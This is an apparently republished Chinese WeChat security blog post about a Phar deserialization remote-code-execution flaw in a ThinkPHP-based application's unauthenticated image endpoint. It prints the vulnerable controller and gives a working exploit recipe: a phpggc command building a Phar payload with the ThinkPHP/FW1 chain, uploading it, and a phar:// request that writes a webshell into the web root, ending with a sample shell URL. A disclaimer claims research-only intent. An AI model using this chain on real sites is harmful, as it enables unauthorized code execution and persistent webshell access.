点击上方蓝字关注我们 并设为星标
0x01 过程
<?phpnamespace appapicontroller;use appcommoncontrollerApi as CommonController;final classImageextendsCommonController{protected $noNeedLogin = '*';protected $noNeedRight = '*';publicfunction_initialize() {parent::_initialize(); } public function image() { $imageData = file_get_contents(input('url')); $image = imagecreatefromstring($imageData); header("Content-Type: image/jpeg"); imagejpeg($image); imagedestroy($image); exit; }}
首先需要用phpggc 生成一个Phar反序列化包,用ThinkPHP/FW1 这个利用链,注意需要绝对路径打对,然后本地放一个aaa.php 这里是你要写入的内容 (phpggc 可能会出点问题,把出问题的利用链文件直接删除即可).
php.exe phpggc -p phar -o aaa.phar ThinkPHP/FW1 /www/wwwroot/xxxxx.com/public/ aaa.php
这里上传点颇多,随便找个点传上去即可.
然后访问直接 /api/image/image?url=phar://./upload/图片地址.png 即可直接调用该利用链写入SHELL到其目录下
http://192.168.200.128/3b58a9545013e88c7186db11bb158c44.php
0x02 phpggc下载
标签:代码审计,0day,渗透测试,系统,通用,转转,Deepseek,AI
phpggc关注公众号,发送 250418 获取!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):【代码审计】记某次项目前台反序列化RCE漏洞研究
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论